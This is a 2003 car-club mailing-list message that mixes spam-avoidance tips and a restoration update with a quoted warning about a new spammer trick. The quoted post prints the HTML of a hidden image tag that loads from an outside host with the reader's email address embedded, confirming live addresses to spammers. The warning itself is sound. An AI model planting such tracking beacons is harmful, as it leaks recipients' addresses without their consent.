Like all of I get the usual assortment of spam, 10 to 15 a day. Several months
ago I started the habit of looking in the list of new mail and before opening,
deleting anything that originated from someone I didn't know or whose subject
line made it obvious enough. Then I'd go back and begin to read what remained.
I'm certain I've deleted a couple from list members but by and large I read
enough from the group to be familiar with most of your e-mail "handles". With
this and the usual assortment of anti-virus, etc software I haven't yet been
infected with anything. I probably still receive the odd one but not even
opening the e-mail (or having the preview option enabled which opens it
them)keeps me a little safer and up and running longer.
On a better note! I just came back from the paint shop and my 1961 Series II
has six new coats of colour (39 from Jan's paint chips) and six new coats of
clear on a frame-off restoration of a rust free body! They start buffing it
tomorrow! Took some good pictures with my wife's new digital camera that I wish
I could send to you all as attachments but they'd be stripped off before
getting to you. It's so great after a couple of years to see my Alpine with a
beautiful new coat on. 8~)
Eddie Donovan (AlpineII)
Carlsbad Springs, Ontario
Series II, 1961 - B9108405 LRX - Finished the paint shop and starting to
re-assemble.
Series II, 1961 - B9104430 ODLR - Future project
SAOCA Member #20
-----Original Message-----
From: Jarrid Gross [mailto:JGross@econolite.com]
Sent: Thursday, January 09, 2003 3:01 PM
To: T.J. Higgins; Alpines
Subject: [OT] New spamming technique.
Piners,
I think Ive uncovered a now way for spammers to see if they have a live
email address.
The email has a clever subject line that almost anyone will click on,
"Changes to your email account"
The email itself is almost jibberish, not even spammy, but it has hidden
HTML in it that refers to a website, and the body of the HTML has your email
address embedded in it that will get sent in an HTML dialag when you view
the email.
here is the HTML if anyone is interested, I substituted
"your_email@your_domain.com" for my
email address.
<body><img
src="http://www.listo01.com/FMPro?-db=tr.fp5&-format=tr.htm&e=your_email@you
r_domain.com
&b=tue07&-new" border="0" width="2" height="1"></body></html>
As you can see, the spammer can verify automatically if he has a live
address just be sending the
email and then watching the HTML traffic on his web server.
I suspect my spam load is about to skyrocket.
Jarrid Gross
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